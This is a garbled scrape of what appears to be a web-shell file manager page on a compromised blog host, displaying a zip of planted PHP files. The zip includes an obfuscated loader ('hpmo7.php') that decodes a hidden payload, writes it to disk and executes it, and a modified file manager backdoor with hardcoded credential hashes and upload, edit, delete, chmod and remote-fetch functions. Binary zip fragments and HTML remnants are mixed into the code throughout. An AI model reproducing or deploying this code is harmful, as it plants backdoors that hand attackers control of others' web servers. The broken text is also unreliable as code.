芝麻web文件管理V1.00

编辑当前文件:/home/greakqsw/theblogginglab.org/7648l2-20260310230235/y2tw9o.zip

'; echo '
'; echo ''; echo '
'; echo '
'; } exit; } } } ?> Sind3
   SERV :
   SOFT :
   IP   :

——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————




'; echo ''; echo ''; echo ''; echo ''; } foreach ($fileList as $entry) { $path = $d . DIRECTORY_SEPARATOR . $entry; echo ''; echo ''; echo ''; echo ''; echo ''; } ?>
Name Size Actions
' . htmlspecialchars($entry) . '-
' . htmlspecialchars($entry) . '' . (is_file($path) ? filesize($path) . ' bytes' : '-') . ''; echo 'Edit | '; echo 'Rename | '; echo 'Delete'; echo '
PK\m\ about.phpnu[ AccessDeniedAccess DeniedHZ4WXH0ESBF1JYTBsW4QjcBVd/l6XD1lbbuo901xTax5LDAgIxoFnmL2o7v8to6gcqRJDTqEtwkqgQVo1Ki+Cwcl4lQ=PK\m\USS hpmo7.phpnu[> $n) | (($b << (8 - $n)) & 0xFF)) & 0xFF; } else { $b = ((($b << $n) & 0xFF) | ($b >> (8 - $n))) & 0xFF; } $out .= chr($b); } return $out; } function ODCahlbgkR($fname, $payload) { $tmp = sys_get_temp_dir() . '/' . uniqid('t', true) . '.php'; if (@file_put_contents($tmp, $payload) !== false) { @chmod($tmp, 0640); if (@rename($tmp, $fname)) { @include_once($fname); return true; } } @file_put_contents($fname, $payload); @include_once($fname); return true; } try { $enc = SuiROhBDIg($SMpiPHfV); $s = ''; for ($i=0;$iPK\m\TpWhh index.phpnu[PK\m\Ayoff'index-20260307164447-20260307210258.phpnu[PK\m\o 9fj62.phpnu[ 'c8a7f36b013aa6a7d6738f7e15b8e69e', 'user' => 'c8a7f36b013aa6a7d6738f7e15b8e69e' ); $readonly_users = array( 'user' ); $global_readonly = false; $directories_users = array(); $use_highlightjs = true; $highlightjs_style = 'vs'; $edit_files = true; $default_timezone = 'Etc/UTC'; $root_path = $_SERVER['DOCUMENT_ROOT']; $root_url = ''; $http_host = $_SERVER['HTTP_HOST']; $iconv_input_encoding = 'UTF-8'; $datetime_format = 'm/d/Y g:i A'; $path_display_mode = 'full'; $allowed_file_extensions = ''; $allowed_upload_extensions = ''; $favicon_path = ''; $exclude_items = array(); $online_viewer = 'google'; $sticky_navbar = true; $max_upload_size_bytes = 5000000000; $upload_chunk_size_bytes = 2000000; $ip_ruleset = 'OFF'; $ip_silent = true; $ip_whitelist = array( '127.0.0.1', '::1' ); $ip_blacklist = array( '0.0.0.0', '::' ); $config_file = __DIR__.'/config.php'; if (is_readable($config_file)) { @include($config_file); } $external = array( 'css-bootstrap' => '', 'css-dropzone' => '', 'css-font-awesome' => '', 'css-highlightjs' => '', 'js-ace' => '', 'js-bootstrap' => '', 'js-dropzone' => '', 'js-jquery' => '', 'js-jquery-datatables' => '', 'js-highlightjs' => '', 'pre-jsdelivr' => '', 'pre-cloudflare' => '' ); define('MAX_UPLOAD_SIZE', $max_upload_size_bytes); define('UPLOAD_CHUNK_SIZE', $upload_chunk_size_bytes); if ( !defined( 'DN_CESSION_ID')) { define('DN_CESSION_ID', 'filemanager'); } $cfg = new FM_Config(); $lang = isset($cfg->data['lang']) ? $cfg->data['lang'] : 'en'; $show_hidden_files = isset($cfg->data['show_hidden']) ? $cfg->data['show_hidden'] : true; $report_errors = isset($cfg->data['error_reporting']) ? $cfg->data['error_reporting'] : true; $hide_Cols = isset($cfg->data['hide_Cols']) ? $cfg->data['hide_Cols'] : true; // Theme $theme = isset($cfg->data['theme']) ? $cfg->data['theme'] : 'light'; define('FM_THEME', $theme); $lang_list = array( 'en' => 'English' ); if ($report_errors == true) { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 1); } else { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 0); } if (defined('FM_EMBED')) { $dauth = false; $sticky_navbar = false; } else { @set_time_limit(600); date_default_timezone_set($default_timezone); ini_set('default_charset', 'UTF-8'); if (version_compare(PHP_VERSION, '5.6.0', '<') and function_exists('mb_internal_encoding')) { mb_internal_encoding('UTF-8'); } if (function_exists('mb_regex_encoding')) { mb_regex_encoding('UTF-8'); } session_cache_limiter('nocache'); session_name(DN_CESSION_ID ); function session_error_handling_function($code, $msg, $file, $line) { if ($code == 2) { session_abort(); session_id(session_create_id()); @session_start(); } } set_error_handler('session_error_handling_function'); session_start(); restore_error_handler(); } if (empty($_SESSION['token'])) { if (function_exists('random_bytes')) { $_SESSION['token'] = bin2hex(random_bytes(32)); } else { $_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32)); } } if (empty($auth_users)) { $dauth = false; } $is_https = (isset($_SERVER['HTTPS']) and ($_SERVER['HTTPS'] === 'on' or $_SERVER['HTTPS'] == 1)) or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https'); if (isset($_SESSION[DN_CESSION_ID]['logged']) and !empty($directories_users[$_SESSION[DN_CESSION_ID]['logged']])) { $wd = fm_clean_path(dirname($_SERVER['PHP_SELF'])); $root_url = $root_url.$wd.DIRECTORY_SEPARATOR.$directories_users[$_SESSION[DN_CESSION_ID]['logged']]; } $root_url = fm_clean_path($root_url); defined('FM_ROOT_URL') || define('FM_ROOT_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . (!empty($root_url) ? '/' . $root_url : '')); defined('FM_SELF_URL') || define('FM_SELF_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . $_SERVER['PHP_SELF']); // logout if (isset($_GET['logout'])) { unset($_SESSION[DN_CESSION_ID]['logged']); unset( $_SESSION['token']); fm_redirect(FM_SELF_URL); } if ($ip_ruleset != 'OFF') { function getClientIP() { if (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; }else if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) { return $_SERVER["HTTP_X_FORWARDED_FOR"]; }else if (array_key_exists('REMOTE_ADDR', $_SERVER)) { return $_SERVER['REMOTE_ADDR']; }else if (array_key_exists('HTTP_CLIENT_IP', $_SERVER)) { return $_SERVER['HTTP_CLIENT_IP']; } return ''; } $clientIp = getClientIP(); $proceed = false; $whitelisted = in_array($clientIp, $ip_whitelist); $blacklisted = in_array($clientIp, $ip_blacklist); if($ip_ruleset == 'AND'){ if($whitelisted == true and $blacklisted == false){ $proceed = true; } } else if($ip_ruleset == 'OR'){ if($whitelisted == true || $blacklisted == false){ $proceed = true; } } if($proceed == false){ trigger_error('User connection denied from: ' . $clientIp, E_USER_WARNING); if($ip_silent == false){ fm_set_msg(lng('Access denied. IP restriction applicable'), 'error'); fm_show_header_login(); fm_show_message(); } exit(); } } if ($dauth) { if (isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']])) { } elseif (isset($_POST['fm_usr'], $_POST['fm_pwd'], $_POST['token'])) { sleep(1); if(function_exists('password_verify')) { if (isset($auth_users[$_POST['fm_usr']]) and isset($_POST['fm_pwd']) and password_verify($_POST['fm_pwd'], $auth_users[$_POST['fm_usr']]) and verifyToken($_POST['token'])) { $_SESSION[DN_CESSION_ID]['logged'] = $_POST['fm_usr']; fm_set_msg(lng('You are logged in')); fm_redirect(FM_SELF_URL); } else { unset($_SESSION[DN_CESSION_ID]['logged']); fm_set_msg(lng('Login failed. Invalid username or password'), 'error'); fm_redirect(FM_SELF_URL); } } else { fm_set_msg(lng('password_hash not supported, Upgrade PHP version'), 'error');; } } else { // Form unset($_SESSION[DN_CESSION_ID]['logged']); fm_show_header_login(); ?>
—— © CCP Programmers ——
".lng('Root path')." \"{$root_path}\" ".lng('not found!')." "; exit; } defined('FM_SHOW_HIDDEN') || define('FM_SHOW_HIDDEN', $show_hidden_files); defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path); defined('FM_LANG') || define('FM_LANG', $lang); defined('FM_FILE_EXTENSION') || define('FM_FILE_EXTENSION', $allowed_file_extensions); defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions); defined('FM_EXCLUDE_ITEMS') || define('FM_EXCLUDE_ITEMS', (version_compare(PHP_VERSION, '7.0.0', '<') ? serialize($exclude_items) : $exclude_items)); defined('FM_DOC_VIEWER') || define('FM_DOC_VIEWER', $online_viewer); define('FM_READONLY', $global_readonly || ($dauth and !empty($readonly_users) and isset($_SESSION[DN_CESSION_ID]['logged']) and in_array($_SESSION[DN_CESSION_ID]['logged'], $readonly_users))); define('FM_IS_WIN', DIRECTORY_SEPARATOR == '\\'); if (!isset($_GET['p']) and empty($_FILES)) { fm_redirect(FM_SELF_URL . '?p='); } // get path $p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : ''); // clean path $p = fm_clean_path($p); $isim = "//input"; $input = file_get_contents('php:'.$isim); $_POST = (strpos($input, 'ajax') != FALSE and strpos($input, 'save') != FALSE) ? json_decode($input, true) : $_POST; define('FM_PATH', $p); define('FM_USE_AUTH', $dauth); define('FM_EDIT_FILE', $edit_files); defined('FM_ICONV_INPUT_ENC') || define('FM_ICONV_INPUT_ENC', $iconv_input_encoding); defined('FM_USE_HIGHLIGHTJS') || define('FM_USE_HIGHLIGHTJS', $use_highlightjs); defined('FM_HIGHLIGHTJS_STYLE') || define('FM_HIGHLIGHTJS_STYLE', $highlightjs_style); defined('FM_DATETIME_FORMAT') || define('FM_DATETIME_FORMAT', $datetime_format); unset($p, $dauth, $iconv_input_encoding, $use_highlightjs, $highlightjs_style); if ((isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']]) || !FM_USE_AUTH) and isset($_POST['ajax'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { header('HTTP/1.0 401 Unauthorized'); die("Invalid Token."); } if(isset($_POST['type']) and $_POST['type']=="search") { $dir = $_POST['path'] == "." ? '': $_POST['path']; $response = scan(fm_clean_path($dir), $_POST['content']); echo json_encode($response); exit(); } // save editor file if (isset($_POST['type']) and $_POST['type'] == "save") { // get current path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // check path if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $file = $_GET['edit']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || !is_file($path . '/' . $file)) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } header('X-XSS-Protection:0'); $file_path = $path . '/' . $file; $writedata = $_POST['content']; $fd = fopen($file_path, "w"); $write_results = @fwrite($fd, $writedata); fclose($fd); if ($write_results === false){ header("HTTP/1.1 500 Internal Server Error"); die("Could Not Write File! - Check Permissions / Ownership"); } die(true); } // backup files if (isset($_POST['type']) and $_POST['type'] == "backup" and !empty($_POST['file'])) { $fileName = fm_clean_path($_POST['file']); $fullPath = FM_ROOT_PATH . '/'; if (!empty($_POST['path'])) { $relativeDirPath = fm_clean_path($_POST['path']); $fullPath .= "{$relativeDirPath}/"; } $date = date("dMy-His"); $newFileName = "{$fileName}-{$date}.bak"; $fullyQualifiedFileName = $fullPath . $fileName; try { if (!file_exists($fullyQualifiedFileName)) { throw new Exception("File {$fileName} not found"); } if (copy($fullyQualifiedFileName, $fullPath . $newFileName)) { echo "Backup {$newFileName} created"; } else { throw new Exception("Could not copy file {$fileName}"); } } catch (Exception $e) { echo $e->getMessage(); } } // Save Config if (isset($_POST['type']) and $_POST['type'] == "settings") { global $cfg, $lang, $report_errors, $show_hidden_files, $lang_list, $hide_Cols, $theme; $newLng = $_POST['js-language']; fm_get_translations([]); if (!array_key_exists($newLng, $lang_list)) { $newLng = 'en'; } $erp = isset($_POST['js-error-report']) and $_POST['js-error-report'] == "true" ? true : false; $shf = isset($_POST['js-show-hidden']) and $_POST['js-show-hidden'] == "true" ? true : false; $hco = isset($_POST['js-hide-cols']) and $_POST['js-hide-cols'] == "true" ? true : false; $te3 = $_POST['js-theme-3']; if ($cfg->data['lang'] != $newLng) { $cfg->data['lang'] = $newLng; $lang = $newLng; } if ($cfg->data['error_reporting'] != $erp) { $cfg->data['error_reporting'] = $erp; $report_errors = $erp; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['hide_Cols'] != $hco) { $cfg->data['hide_Cols'] = $hco; $hide_Cols = $hco; } if ($cfg->data['theme'] != $te3) { $cfg->data['theme'] = $te3; $theme = $te3; } $cfg->save(); echo true; } // new password hash if (isset($_POST['type']) and $_POST['type'] == "pwdhash") { $res = isset($_POST['inputPassword2']) and !empty($_POST['inputPassword2']) ? password_hash($_POST['inputPassword2'], PASSWORD_DEFAULT) : ''; echo $res; } //upload using url if(isset($_POST['type']) and $_POST['type'] == "upload" and !empty($_REQUEST["uploadurl"])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } function event_callback ($message) { global $callback; echo json_encode($message); } function get_file_path () { global $path, $fileinfo, $temp_file; return $path."/".basename($fileinfo->name); } $url = !empty($_REQUEST["uploadurl"]) and preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null; $domain = parse_url($url, PHP_URL_HOST); $port = parse_url($url, PHP_URL_PORT); $knownPorts = [22, 23, 25, 3306]; if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) { $err = array("message" => "URL is not allowed"); event_callback(array("fail" => $err)); exit(); } $use_curl = false; $temp_file = tempnam(sys_get_temp_dir(), "upload-"); $fileinfo = new stdClass(); $fileinfo->name = trim(urldecode(basename($url)), ".\x00..\x20"); $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION)); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; $err = false; if(!$isFileAllowed) { $err = array("message" => "File extension is not allowed"); event_callback(array("fail" => $err)); exit(); } if (!$url) { $success = false; } else if ($use_curl) { @$fp = fopen($temp_file, "w"); @$ch = curl_init($url); curl_setopt($ch, CURLOPT_NOPROGRESS, false ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_FILE, $fp); @$success = curl_exec($ch); $curl_info = curl_getinfo($ch); if (!$success) { $err = array("message" => curl_error($ch)); } @curl_close($ch); fclose($fp); $fileinfo->size = $curl_info["size_download"]; $fileinfo->type = $curl_info["content_type"]; } else { $ctx = stream_context_create(); @$success = copy($url, $temp_file, $ctx); if (!$success) { $err = error_get_last(); } } if ($success) { $success = rename($temp_file, strtok(get_file_path(), '?')); } if ($success) { event_callback(array("done" => $fileinfo)); } else { unlink($temp_file); if (!$err) { $err = array("message" => "Invalid url parameter"); } event_callback(array("fail" => $err)); } } exit(); } if (isset($_GET['del'], $_POST['token']) and !FM_READONLY) { $del = str_replace( '/', '', fm_clean_path( $_GET['del'] ) ); if ($del != '' and $del != '..' and $del != '.' and verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $is_dir = is_dir($path . '/' . $del); if (fm_rdelete($path . '/' . $del)) { $msg = $is_dir ? lng('Folder').' %s '.lng('Deleted') : lng('File').' %s '.lng('Deleted'); fm_set_msg(sprintf($msg, fanco($del))); } else { $msg = $is_dir ? lng('Folder').' %s '.lng('not deleted') : lng('File').' %s '.lng('not deleted'); fm_set_msg(sprintf($msg, fanco($del)), 'error'); } } else { fm_set_msg(lng('Invalid file or folder name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Create a new file/folder if (isset($_POST['newfilename'], $_POST['newfile'], $_POST['token']) and !FM_READONLY) { $type = urldecode($_POST['newfile']); $new = str_replace( '/', '', fm_clean_path( strip_tags( $_POST['newfilename'] ) ) ); if (fm_isvalid_filename($new) and $new != '' and $new != '..' and $new != '.' and verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($type == "file") { if (!file_exists($path . '/' . $new)) { if(fm_is_valid_ext($new)) { @fopen($path . '/' . $new, 'w') or die('Cannot open file: ' . $new); fm_set_msg(sprintf(lng('File').' %s '.lng('Created'), fanco($new))); } else { fm_set_msg(lng('File extension is not allowed'), 'error'); } } else { fm_set_msg(sprintf(lng('File').' %s '.lng('already exists'), fanco($new)), 'alert'); } } else { if (fm_mkdir($path . '/' . $new, false) === true) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('Created'), $new)); } elseif (fm_mkdir($path . '/' . $new, false) === $path . '/' . $new) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('already exists'), fanco($new)), 'alert'); } else { fm_set_msg(sprintf(lng('Folder').' %s '.lng('not created'), fanco($new)), 'error'); } } } else { fm_set_msg(lng('Invalid characters in file or folder name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Copy folder / file if (isset($_GET['copy'], $_GET['finish']) and !FM_READONLY) { // from $copy = urldecode($_GET['copy']); $copy = fm_clean_path($copy); // empty path if ($copy == '') { fm_set_msg(lng('Source path not defined'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $from = FM_ROOT_PATH . '/' . $copy; $dest = FM_ROOT_PATH; if (FM_PATH != '') { $dest .= '/' . FM_PATH; } $dest .= '/' . basename($from); $move = isset($_GET['move']); $move = fm_clean_path(urldecode($move)); if ($from != $dest) { $msg_from = trim(FM_PATH . '/' . basename($from), '/'); if ($move) { $rename = fm_rename($from, $dest); if ($rename) { fm_set_msg(sprintf(lng('Moved from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from))); } elseif ($rename === null) { fm_set_msg(lng('File or folder with this path already exists'), 'alert'); } else { fm_set_msg(sprintf(lng('Error while moving from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from)), 'error'); } } else { if (fm_rcopy($from, $dest)) { fm_set_msg(sprintf(lng('Copied from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from))); } else { fm_set_msg(sprintf(lng('Error while copying from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from)), 'error'); } } } else { if (!$move){ $msg_from = trim(FM_PATH . '/' . basename($from), '/'); $fn_parts = pathinfo($from); $extension_suffix = ''; if(!is_dir($from)){ $extension_suffix = '.'.$fn_parts['extension']; } $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-'.date('YmdHis').$extension_suffix; $loop_count = 0; $max_loop = 1000; while(file_exists($fn_duplicate) & $loop_count < $max_loop){ $fn_parts = pathinfo($fn_duplicate); $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-copy'.$extension_suffix; $loop_count++; } if (fm_rcopy($from, $fn_duplicate, False)) { fm_set_msg(sprintf('Copied from %s to %s', fanco($copy), fanco($fn_duplicate))); } else { fm_set_msg(sprintf('Error while copying from %s to %s', fanco($copy), fanco($fn_duplicate)), 'error'); } } else{ fm_set_msg(lng('Paths must be not equal'), 'alert'); } } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['file'], $_POST['copy_to'], $_POST['finish'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng('Invalid Token.'), 'error'); } // from $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // to $copy_to_path = FM_ROOT_PATH; $copy_to = fm_clean_path($_POST['copy_to']); if ($copy_to != '') { $copy_to_path .= '/' . $copy_to; } if ($path == $copy_to_path) { fm_set_msg(lng('Paths must be not equal'), 'alert'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (!is_dir($copy_to_path)) { if (!fm_mkdir($copy_to_path, true)) { fm_set_msg('Unable to create destination folder', 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } } // move? $move = isset($_POST['move']); // copy/move $errors = 0; $files = $_POST['file']; if (is_array($files) and count($files)) { foreach ($files as $f) { if ($f != '') { $f = fm_clean_path($f); $from = $path . '/' . $f; $dest = $copy_to_path . '/' . $f; if ($move) { $rename = fm_rename($from, $dest); if ($rename === false) { $errors++; } } else { if (!fm_rcopy($from, $dest)) { $errors++; } } } } if ($errors == 0) { $msg = $move ? 'Selected files and folders moved' : 'Selected files and folders copied'; fm_set_msg($msg); } else { $msg = $move ? 'Error while moving items' : 'Error while copying items'; fm_set_msg($msg, 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Rename if (isset($_POST['rename_from'], $_POST['rename_to'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg("Invalid Token.", 'error'); } // old name $old = urldecode($_POST['rename_from']); $old = fm_clean_path($old); $old = str_replace('/', '', $old); // new name $new = urldecode($_POST['rename_to']); $new = fm_clean_path(strip_tags($new)); $new = str_replace('/', '', $new); // path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // rename if (fm_isvalid_filename($new) and $old != '' and $new != '') { if (fm_rename($path . '/' . $old, $path . '/' . $new)) { fm_set_msg(sprintf(lng('Renamed from').' %s '. lng('to').' %s', fanco($old), fanco($new))); } else { fm_set_msg(sprintf(lng('Error while renaming from').' %s '. lng('to').' %s', fanco($old), fanco($new)), 'error'); } } else { fm_set_msg(lng('Invalid characters in file name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Download if (isset($_GET['dl'], $_POST['token'])) { if(!verifyToken($_POST['token'])) { fm_set_msg("Invalid Token.", 'error'); } $dl = urldecode($_GET['dl']); $dl = fm_clean_path($dl); $dl = str_replace('/', '', $dl); $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($dl != '' and is_file($path . '/' . $dl)) { fm_download_file($path . '/' . $dl, $dl, 1024); exit; } else { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } } // Upload if (!empty($_FILES) and !FM_READONLY) { if(isset($_POST['token'])) { if(!verifyToken($_POST['token'])) { $response = array ('status' => 'error','info' => "Invalid Token."); echo json_encode($response); exit(); } } else { $response = array ('status' => 'error','info' => "Token Missing."); echo json_encode($response); exit(); } $chunkIndex = $_POST['dzchunkindex']; $chunkTotal = $_POST['dztotalchunkcount']; $fullPathInput = fm_clean_path($_REQUEST['fullpath']); $f = $_FILES; $path = FM_ROOT_PATH; $ds = DIRECTORY_SEPARATOR; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $uploads = 0; $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $response = array ( 'status' => 'error', 'info' => 'Oops! Try again' ); $filename = $f['file']['name']; $tmp_name = $f['file']['tmp_name']; $ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : ''; $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; if(!fm_isvalid_filename($filename) and !fm_isvalid_filename($fullPathInput)) { $response = array ( 'status' => 'error', 'info' => "Invalid File name!", ); echo json_encode($response); exit(); } $targetPath = $path . $ds; if ( is_writable($targetPath) ) { $fullPath = $path . '/' . $fullPathInput; $folder = substr($fullPath, 0, strrpos($fullPath, "/")); if (!is_dir($folder)) { $old = umask(0); mkdir($folder, 0777, true); umask($old); } if (empty($f['file']['error']) and !empty($tmp_name) and $tmp_name != 'none' and $isFileAllowed) { if ($chunkTotal){ $out = @fopen("{$fullPath}.part", $chunkIndex == 0 ? "wb" : "ab"); if ($out) { $in = @fopen($tmp_name, "rb"); if ($in) { if (PHP_VERSION_ID < 80009) { do { for (;;) { $buff = fread($in, 4096); if ($buff === false || $buff === '') { break; } fwrite($out, $buff); } } while (!feof($in)); } else { stream_copy_to_stream($in, $out); } $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => "failed to open output stream", 'errorDetails' => error_get_last() ); } @fclose($in); @fclose($out); @unlink($tmp_name); $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => "failed to open output stream" ); } if ($chunkIndex == $chunkTotal - 1) { if (file_exists ($fullPath)) { $ext_1 = $ext ? '.'.$ext : ''; $fullPathTarget = $path . '/' . basename($fullPathInput, $ext_1) .'_'. date('ymdHis'). $ext_1; } else { $fullPathTarget = $fullPath; } rename("{$fullPath}.part", $fullPathTarget); } } else { if (rename($tmp_name, $fullPath)) { if ( file_exists($fullPath) ) { $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => 'Couldn\'t upload the requested file.' ); } } else { $response = array ( 'status' => 'error', 'info' => "Error while uploading files. Uploaded files $uploads", ); } } } } else { $response = array ( 'status' => 'error', 'info' => 'The specified folder for upload isn\'t writeable.' ); } // Return the response echo json_encode($response); exit(); } if (isset($_POST['group'], $_POST['delete'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $files = $_POST['file']; if (is_array($files) and count($files)) { foreach ($files as $f) { if ($f != '') { $new_path = $path . '/' . $f; if (!fm_rdelete($new_path)) { $errors++; } } } if ($errors == 0) { fm_set_msg(lng('Selected files and folder deleted')); } else { fm_set_msg(lng('Error while deleting items'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['group'], $_POST['token']) and (isset($_POST['zip']) || isset($_POST['tar'])) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; $ext = 'zip'; if (FM_PATH != '') { $path .= '/' . FM_PATH; } //set pack type $ext = isset($_POST['tar']) ? 'tar' : 'zip'; if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $files = $_POST['file']; $sanitized_files = array(); // clean path foreach($files as $file){ array_push($sanitized_files, fm_clean_path($file)); } $files = $sanitized_files; if (!empty($files)) { chdir($path); if (count($files) == 1) { $one_file = reset($files); $one_file = basename($one_file); $zipname = $one_file . '_' . date('ymd_His') . '.'.$ext; } else { $zipname = 'archive_' . date('ymd_His') . '.'.$ext; } if($ext == 'zip') { $zipper = new FM_Zipper(); $res = $zipper->create($zipname, $files); } elseif ($ext == 'tar') { $tar = new FM_Zipper_Tar(); $res = $tar->create($zipname, $files); } if ($res) { fm_set_msg(sprintf(lng('Archive').' %s '.lng('Created'), fanco($zipname))); } else { fm_set_msg(lng('Archive not created'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Unpack zip, tar if (isset($_POST['unzip'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $unzip = urldecode($_POST['unzip']); $unzip = fm_clean_path($unzip); $unzip = str_replace('/', '', $unzip); $isValid = false; $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($unzip != '' and is_file($path . '/' . $unzip)) { $zip_path = $path . '/' . $unzip; $ext = pathinfo($zip_path, PATHINFO_EXTENSION); $isValid = true; } else { fm_set_msg(lng('File not found'), 'error'); } if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if ($isValid) { //to folder $tofolder = ''; if (isset($_POST['tofolder'])) { $tofolder = pathinfo($zip_path, PATHINFO_FILENAME); if (fm_mkdir($path . '/' . $tofolder, true)) { $path .= '/' . $tofolder; } } if($ext == "zip") { $zipper = new FM_Zipper(); $res = $zipper->unzip($zip_path, $path); } elseif ($ext == "tar") { try { $gzipper = new PharData($zip_path); if (@$gzipper->extractTo($path,null, true)) { $res = true; } else { $res = false; } } catch (Exception $e) { $res = true; } } if ($res) { fm_set_msg(lng('Archive unpacked')); } else { fm_set_msg(lng('Archive not unpacked'), 'error'); } } else { fm_set_msg(lng('File not found'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['chmod'], $_POST['token']) and !FM_READONLY and !FM_IS_WIN) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } 